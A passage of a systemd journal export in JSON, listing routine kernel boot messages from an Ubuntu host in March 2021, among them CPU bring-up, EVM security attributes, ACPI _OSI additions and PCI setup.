"PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "107139", "MESSAGE" : "NMI watchdog: Perf event create on CPU 0 failed with -2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a2;b=e2b08827b5804427b422c10c84f1567e;m=55886e;t=5bd16dd1907d5;x=f34ce16a2801a7cf", "__REALTIME_TIMESTAMP" : "1615280779888597", "__MONOTONIC_TIMESTAMP" : "5605486", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "108004", "MESSAGE" : "NMI watchdog: Perf NMI watchdog permanently disabled" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a3;b=e2b08827b5804427b422c10c84f1567e;m=55887b;t=5bd16dd1907e2;x=9e2f8a8d707002f2", "__REALTIME_TIMESTAMP" : "1615280779888610", "__MONOTONIC_TIMESTAMP" : "5605499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "111112", "MESSAGE" : "smp: Bringing up secondary CPUs ..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a4;b=e2b08827b5804427b422c10c84f1567e;m=558886;t=5bd16dd1907ed;x=bb76f562d5c0de88", "__REALTIME_TIMESTAMP" : "1615280779888621", "__MONOTONIC_TIMESTAMP" : "5605510", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "112005", "MESSAGE" : "smp: Brought up 1 node, 1 CPU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a5;b=e2b08827b5804427b422c10c84f1567e;m=558891;t=5bd16dd1907f8;x=33b630f886699e2d", "__REALTIME_TIMESTAMP" : "1615280779888632", "__MONOTONIC_TIMESTAMP" : "5605521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "114131", "MESSAGE" : "smpboot: Max logical packages: 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a6;b=e2b08827b5804427b422c10c84f1567e;m=55889b;t=5bd16dd190803;x=2a53e8a90fc43148", "__REALTIME_TIMESTAMP" : "1615280779888643", "__MONOTONIC_TIMESTAMP" : "5605531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 
"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "116005", "MESSAGE" : "smpboot: Total of 1 processors activated (4199.98 BogoMIPS)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a7;b=e2b08827b5804427b422c10c84f1567e;m=5588a6;t=5bd16dd19080e;x=746894420000de9d", "__REALTIME_TIMESTAMP" : "1615280779888654", "__MONOTONIC_TIMESTAMP" : "5605542", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "119435", "MESSAGE" : "devtmpfs: initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a8;b=e2b08827b5804427b422c10c84f1567e;m=5588b1;t=5bd16dd190818;x=e72a5a38f55f26df", "__REALTIME_TIMESTAMP" : "1615280779888664", "__MONOTONIC_TIMESTAMP" : "5605553", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "120068", "MESSAGE" : "x86/mm: Memory block size: 128MB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a9;b=e2b08827b5804427b422c10c84f1567e;m=5588bb;t=5bd16dd190823;x=c0a4ca14054c8e4", "__REALTIME_TIMESTAMP" : "1615280779888675", "__MONOTONIC_TIMESTAMP" : "5605563", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "122504", "MESSAGE" : "evm: security.selinux" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=aa;b=e2b08827b5804427b422c10c84f1567e;m=5588c6;t=5bd16dd19082d;x=558fdecd8286a4dc", "__REALTIME_TIMESTAMP" : "1615280779888685", "__MONOTONIC_TIMESTAMP" : "5605574", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "124007", "MESSAGE" : "evm: security.SMACK64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ab;b=e2b08827b5804427b422c10c84f1567e;m=5588d0;t=5bd16dd190838;x=2f1ea8009bd59d94", "__REALTIME_TIMESTAMP" : "1615280779888696", "__MONOTONIC_TIMESTAMP" : "5605584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "125731", "MESSAGE" : "evm: security.SMACK64EXEC" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ac;b=e2b08827b5804427b422c10c84f1567e;m=5588db;t=5bd16dd190843;x=14f8462e86947c7b", "__REALTIME_TIMESTAMP" : "1615280779888707", "__MONOTONIC_TIMESTAMP" : "5605595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "127648", "MESSAGE" : "evm: security.SMACK64TRANSMUTE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ad;b=e2b08827b5804427b422c10c84f1567e;m=5588e9;t=5bd16dd190850;x=83d11ee26d1c338a", "__REALTIME_TIMESTAMP" : "1615280779888720", "__MONOTONIC_TIMESTAMP" : "5605609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "128005", "MESSAGE" : "evm: security.SMACK64MMAP" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ae;b=e2b08827b5804427b422c10c84f1567e;m=5588f3;t=5bd16dd19085b;x=ee2eb152bf5ce56e", "__REALTIME_TIMESTAMP" : "1615280779888731", "__MONOTONIC_TIMESTAMP" : "5605619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "129921", "MESSAGE" : "evm: security.apparmor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=af;b=e2b08827b5804427b422c10c84f1567e;m=5588fe;t=5bd16dd190865;x=ab6a0d553baa82c5", "__REALTIME_TIMESTAMP" : "1615280779888741", "__MONOTONIC_TIMESTAMP" : "5605630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "131759", "MESSAGE" : "evm: security.ima" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b0;b=e2b08827b5804427b422c10c84f1567e;m=558908;t=5bd16dd190870;x=a9eb69f594c7fb0b", "__REALTIME_TIMESTAMP" : "1615280779888752", "__MONOTONIC_TIMESTAMP" : "5605640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "132004", "MESSAGE" : "evm: security.capability" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b1;b=e2b08827b5804427b422c10c84f1567e;m=558913;t=5bd16dd19087b;x=368f694212dd1cfd", "__REALTIME_TIMESTAMP" : "1615280779888763", "__MONOTONIC_TIMESTAMP" : "5605651", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : 
"6", "_SOURCE_MONOTONIC_TIMESTAMP" : "134067", "MESSAGE" : "clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b2;b=e2b08827b5804427b422c10c84f1567e;m=55891e;t=5bd16dd190885;x=a4b40ddaf08c750b", "__REALTIME_TIMESTAMP" : "1615280779888773", "__MONOTONIC_TIMESTAMP" : "5605662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "136014", "MESSAGE" : "futex hash table entries: 256 (order: 2, 16384 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b3;b=e2b08827b5804427b422c10c84f1567e;m=55894a;t=5bd16dd1908b2;x=ac4fd07b5b9baa26", "__REALTIME_TIMESTAMP" : "1615280779888818", "__MONOTONIC_TIMESTAMP" : "5605706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "139127", "MESSAGE" : "pinctrl core: initialized pinctrl subsystem" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b4;b=e2b08827b5804427b422c10c84f1567e;m=558958;t=5bd16dd1908bf;x=109ba1c01d9671b8", "__REALTIME_TIMESTAMP" : "1615280779888831", "__MONOTONIC_TIMESTAMP" : "5605720", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "140213", "MESSAGE" : "RTC time: 9:06:13, date: 03/09/21" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b5;b=e2b08827b5804427b422c10c84f1567e;m=558971;t=5bd16dd1908d8;x=80838b6178b3c0c8", "__REALTIME_TIMESTAMP" : "1615280779888856", 
"__MONOTONIC_TIMESTAMP" : "5605745", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "142476", "MESSAGE" : "NET: Registered protocol family 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b6;b=e2b08827b5804427b422c10c84f1567e;m=55897b;t=5bd16dd1908e2;x=cf1b6348726ee031", "__REALTIME_TIMESTAMP" : "1615280779888866", "__MONOTONIC_TIMESTAMP" : "5605755", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "144130", "MESSAGE" : "audit: initializing netlink subsys (disabled)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b7;b=e2b08827b5804427b422c10c84f1567e;m=558987;t=5bd16dd1908ee;x=d881522247a210fc", "__REALTIME_TIMESTAMP" : "1615280779888878", "__MONOTONIC_TIMESTAMP" : "5605767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "146824", "MESSAGE" : "cpuidle: using governor ladder" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b8;b=e2b08827b5804427b422c10c84f1567e;m=5589a5;t=5bd16dd19090c;x=f98760cb0fc5f2a9", "__REALTIME_TIMESTAMP" : "1615280779888908", "__MONOTONIC_TIMESTAMP" : "5605797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "148005", "MESSAGE" : "cpuidle: using governor menu" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b9;b=e2b08827b5804427b422c10c84f1567e;m=5589c7;t=5bd16dd19092e;x=17c77ea6d366b3e3", "__REALTIME_TIMESTAMP" : "1615280779888942", "__MONOTONIC_TIMESTAMP" : "5605831", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "150022", "MESSAGE" : "ACPI: bus type PCI registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ba;b=e2b08827b5804427b422c10c84f1567e;m=5589d4;t=5bd16dd19093c;x=5b7e72e98e290b11", "__REALTIME_TIMESTAMP" : "1615280779888956", "__MONOTONIC_TIMESTAMP" : "5605844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "152006", "MESSAGE" : "acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bb;b=e2b08827b5804427b422c10c84f1567e;m=5589de;t=5bd16dd190945;x=a88f6cfbae8d7670", "__REALTIME_TIMESTAMP" : "1615280779888965", "__MONOTONIC_TIMESTAMP" : "5605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "155216", "MESSAGE" : "audit: type=2000 audit(1615280773.856:1): state=initialized audit_enabled=0 res=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bc;b=e2b08827b5804427b422c10c84f1567e;m=5589e7;t=5bd16dd19094f;x=b67c753439edef0f", "__REALTIME_TIMESTAMP" : "1615280779888975", "__MONOTONIC_TIMESTAMP" : "5605863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" 
: "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "156179", "MESSAGE" : "PCI: Using configuration type 1 for base access" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bd;b=e2b08827b5804427b422c10c84f1567e;m=5589f1;t=5bd16dd190958;x=536aeb8a25d630e8", "__REALTIME_TIMESTAMP" : "1615280779888984", "__MONOTONIC_TIMESTAMP" : "5605873", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "160064", "MESSAGE" : "HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=be;b=e2b08827b5804427b422c10c84f1567e;m=5589fa;t=5bd16dd190962;x=7584dce8696d31f5", "__REALTIME_TIMESTAMP" : "1615280779888994", "__MONOTONIC_TIMESTAMP" : "5605882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "163176", "MESSAGE" : "HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bf;b=e2b08827b5804427b422c10c84f1567e;m=558a04;t=5bd16dd19096b;x=5dfc2fc3abb5b9fb", "__REALTIME_TIMESTAMP" : "1615280779889003", "__MONOTONIC_TIMESTAMP" : "5605892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "164236", "MESSAGE" : "ACPI: Added _OSI(Module Device)" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c0;b=e2b08827b5804427b422c10c84f1567e;m=558a10;t=5bd16dd190977;x=7d5acb62d40d66d1", "__REALTIME_TIMESTAMP" : "1615280779889015", "__MONOTONIC_TIMESTAMP" : "5605904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "166441", "MESSAGE" : "ACPI: Added _OSI(Processor Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c1;b=e2b08827b5804427b422c10c84f1567e;m=558a1a;t=5bd16dd190981;x=6ad2bb73c5d4cdf9", "__REALTIME_TIMESTAMP" : "1615280779889025", "__MONOTONIC_TIMESTAMP" : "5605914", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "168010", "MESSAGE" : "ACPI: Added _OSI(3.0 _SCP Extensions)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c2;b=e2b08827b5804427b422c10c84f1567e;m=558a23;t=5bd16dd19098b;x=eae3ea2658bb846e", "__REALTIME_TIMESTAMP" : "1615280779889035", "__MONOTONIC_TIMESTAMP" : "5605923", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "170468", "MESSAGE" : "ACPI: Added _OSI(Processor Aggregator Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c3;b=e2b08827b5804427b422c10c84f1567e;m=558a2c;t=5bd16dd190994;x=41913f21bd12619", "__REALTIME_TIMESTAMP" : "1615280779889044", "__MONOTONIC_TIMESTAMP" : "5605932", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "172025", "MESSAGE" : "ACPI: Added _OSI(Linux-Dell-Video)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c4;b=e2b08827b5804427b422c10c84f1567e;m=558a36;t=5bd16dd19099d;x=5a5ce85035bec8c6", "__REALTIME_TIMESTAMP" : "1615280779889053", "__MONOTONIC_TIMESTAMP" : "5605942", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "174297", "MESSAGE" : "ACPI: Added _OSI(Linux-Lenovo-NV-HDMI-Audio)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c5;b=e2b08827b5804427b422c10c84f1567e;m=558a3f;t=5bd16dd1909a7;x=78b88b41e32ef81d", "__REALTIME_TIMESTAMP" : "1615280779889063", "__MONOTONIC_TIMESTAMP" : "5605951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "176006", "MESSAGE" : "ACPI: Added _OSI(Linux-HPI-Hybrid-Graphics)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c6;b=e2b08827b5804427b422c10c84f1567e;m=558a49;t=5bd16dd1909b0;x=4c34a64f8e5323fc", "__REALTIME_TIMESTAMP" : "1615280779889072", "__MONOTONIC_TIMESTAMP" : "5605961", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "180214", "MESSAGE" : "ACPI: Interpreter enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c7;b=e2b08827b5804427b422c10c84f1567e;m=558a52;t=5bd16dd1909b9;x=e77bf36f1551ba03", "__REALTIME_TIMESTAMP" : "1615280779889081", "__MONOTONIC_TIMESTAMP" : 
"5605970", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "182170", "MESSAGE" : "ACPI: (supports S0 S3 S4 S5)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c8;b=e2b08827b5804427b422c10c84f1567e;m=558a5b;t=5bd16dd1909c3;x=152e79affa7fa7a5", "__REALTIME_TIMESTAMP" : "1615280779889091", "__MONOTONIC_TIMESTAMP" : "5605979", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "184006", "MESSAGE" : "ACPI: Using IOAPIC for interrupt routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c9;b=e2b08827b5804427b422c10c84f1567e;m=558a68;t=5bd16dd1909d0;x=2583037f251faa36", "__REALTIME_TIMESTAMP" : "1615280779889104", "__MONOTONIC_TIMESTAMP" : "5605992", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "186729", "MESSAGE" : "PCI: Using host bridge windows from ACPI; if necessary, use \"pci=nocrs\" and report a bug" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ca;b=e2b08827b5804427b422c10c84f1567e;m=558a75;t=5bd16dd1909dc;x=558fb4a2dc4e9103", "__REALTIME_TIMESTAMP" : "1615280779889116", "__MONOTONIC_TIMESTAMP" : "5606005", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 